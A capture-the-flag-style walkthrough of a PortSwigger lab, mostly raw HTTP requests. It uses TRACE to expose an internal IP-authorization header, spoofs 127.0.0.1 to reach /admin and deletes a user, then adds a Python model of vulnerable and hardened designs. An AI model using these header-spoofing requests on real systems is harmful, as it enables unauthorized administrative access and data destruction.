PortSwigger Web Security Academy lab

Authentication bypass via information disclosure

Solution

Log in as the user wiener (the request body below carries the lab credentials):

POST /login HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=qVjNrWkrzknpC3iydYvA8xXIsH4DvEeW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0a180016039233fe8144399f00a60075.web-security-academy.net
Referer: https://0a180016039233fe8144399f00a60075.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=ufNtI2OEezJ7BSUMDdYZoPiaEkWtygdS&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180016039233fe8144399f00a60075.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Open the admin panel: https://0a180016039233fe8144399f00a60075.web-security-academy.net/admin

The response returns the error: Admin interface only available to local users
---
GET /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Edit the request to the admin panel:

Change the HTTP method from GET to TRACE. The TRACE response echoes the request as the back-end received it, and that echo contains an X-Custom-IP-Authorization header holding our public IP address, a header we never sent, so it was appended upstream. The "local users" check is evidently based on this header, so we add it to our own request with a local IP (127.0.0.1).
---
TRACE /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
HTTP/2 200 OK
Content-Type: message/http
X-Frame-Options: SAMEORIGIN
Content-Length: 623

TRACE /admin HTTP/1.1
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
x-forwarded-for=localhost : 
user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language: pl,en-US;q=0.7,en;q=0.3
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
priority: u=0, i
te: trailers
cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
Content-Length: 0
X-Custom-IP-Authorization: 93.157.114.162
---
Send the GET /admin request again with X-Custom-Ip-Authorization set to 127.0.0.1:

GET /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
X-Custom-Ip-Authorization: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Delete the user carlos from the admin panel:

GET /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
X-Custom-Ip-Authorization: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin/delete?username=carlos HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
X-Custom-Ip-Authorization: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180016039233fe8144399f00a60075.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved
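The following is an added example, not code from the lab or from PortSwigger. It models the two-tier design the walkthrough above exploits: a front-end that stamps the client's address into an internal X-Custom-IP-Authorization header, and a back-end that admits "local users" to /admin based on that header. The vulnerable pair forwards a client-supplied copy of the header and reflects every header through TRACE; the hardened pair strips and overwrites the header at the front-end, refuses TRACE so the internal header is never disclosed, and only honours the header on the hop from the trusted front-end. Every function name, IP address (203.0.113.5, 10.0.0.2) and request dictionary here is constructed for the demonstration; the front-end's "add only if absent" behaviour is an assumption that reproduces what the lab's responses show.

```python
"""Added example modelling the lab's front-end/back-end IP-authorization flaw
and a hardened version. Not the lab's own code; all names and IPs are constructed."""
import ipaddress

INTERNAL_HEADER = "X-Custom-IP-Authorization"
FRONT_END_IP = "10.0.0.2"  # constructed: the only peer the hardened back-end trusts


def _lower(headers):
    """Header names are case-insensitive: 'X-Custom-Ip-Authorization' must match."""
    return {k.lower(): v for k, v in headers.items()}


def _is_loopback(value):
    """Parse the claimed address and report whether it is a loopback address."""
    try:
        return ipaddress.ip_address(value.strip()).is_loopback
    except ValueError:
        return False


def vulnerable_front_end(request, peer_ip):
    """Assumed flaw: the header is only added when the client did not send one,
    so a client-supplied value such as 127.0.0.1 is forwarded unchanged."""
    headers = dict(request["headers"])
    if INTERNAL_HEADER.lower() not in _lower(headers):
        headers[INTERNAL_HEADER] = peer_ip
    return {"method": request["method"], "path": request["path"], "headers": headers}


def vulnerable_back_end(fwd, peer_ip):
    """Trusts the header whoever sent it, and answers TRACE by reflecting every
    header, internal one included, back to the client."""
    if fwd["method"] == "TRACE":
        return 200, "\n".join(f"{k}: {v}" for k, v in fwd["headers"].items())
    if fwd["path"].startswith("/admin"):
        claimed = _lower(fwd["headers"]).get(INTERNAL_HEADER.lower(), "")
        if not _is_loopback(claimed):
            return 401, "Admin interface only available to local users"
    return 200, "ok"


def hardened_front_end(request, peer_ip):
    """Drops every client-supplied copy of the internal header (any case) and
    sets it from the TCP peer address, the only value the front-end can vouch for."""
    headers = {k: v for k, v in request["headers"].items()
               if k.lower() != INTERNAL_HEADER.lower()}
    headers[INTERNAL_HEADER] = peer_ip
    return {"method": request["method"], "path": request["path"], "headers": headers}


def hardened_back_end(fwd, peer_ip):
    """Refuses TRACE outright and honours the internal header only when the
    request arrived over the trusted front-end hop."""
    if fwd["method"] == "TRACE":
        return 405, "method not allowed"
    if fwd["path"].startswith("/admin"):
        if peer_ip != FRONT_END_IP:
            return 403, "forbidden"
        claimed = _lower(fwd["headers"]).get(INTERNAL_HEADER.lower(), "")
        if not _is_loopback(claimed):
            return 401, "Admin interface only available to local users"
    return 200, "ok"


def admin_status(variant, request, client_ip):
    """Run one client request end to end through a variant; return the status code."""
    if variant == "vulnerable":
        return vulnerable_back_end(vulnerable_front_end(request, client_ip), FRONT_END_IP)[0]
    return hardened_back_end(hardened_front_end(request, client_ip), FRONT_END_IP)[0]


def trace_leaks_internal_header(variant, client_ip):
    """True when a TRACE /admin reply discloses the internal header name to the client."""
    req = {"method": "TRACE", "path": "/admin", "headers": {"Cookie": "session=x"}}
    if variant == "vulnerable":
        _, body = vulnerable_back_end(vulnerable_front_end(req, client_ip), FRONT_END_IP)
    else:
        _, body = hardened_back_end(hardened_front_end(req, client_ip), FRONT_END_IP)
    return INTERNAL_HEADER.lower() in body.lower()


# Constructed sample traffic mirroring the write-up's steps (client IP is a doc-range address).
REMOTE_CLIENT = "203.0.113.5"
PLAIN_ADMIN = {"method": "GET", "path": "/admin", "headers": {"Cookie": "session=x"}}
SPOOFED_ADMIN = {"method": "GET", "path": "/admin",
                 "headers": {"Cookie": "session=x", "X-Custom-Ip-Authorization": "127.0.0.1"}}

if __name__ == "__main__":
    for variant in ("vulnerable", "hardened"):
        print(variant,
              "plain:", admin_status(variant, PLAIN_ADMIN, REMOTE_CLIENT),
              "trace leaks header:", trace_leaks_internal_header(variant, REMOTE_CLIENT),
              "spoofed:", admin_status(variant, SPOOFED_ADMIN, REMOTE_CLIENT))
```

Running it shows the vulnerable pair returning 401 for a plain remote request, disclosing the header name over TRACE, and then returning 200 once the client supplies the header itself, while the hardened pair returns 401, 405 and 401 respectively. The two defensive points are independent: stripping and overwriting the internal header at the trust boundary closes the bypass even if TRACE stays enabled, and disabling TRACE removes the disclosure that made the header name discoverable in the first place.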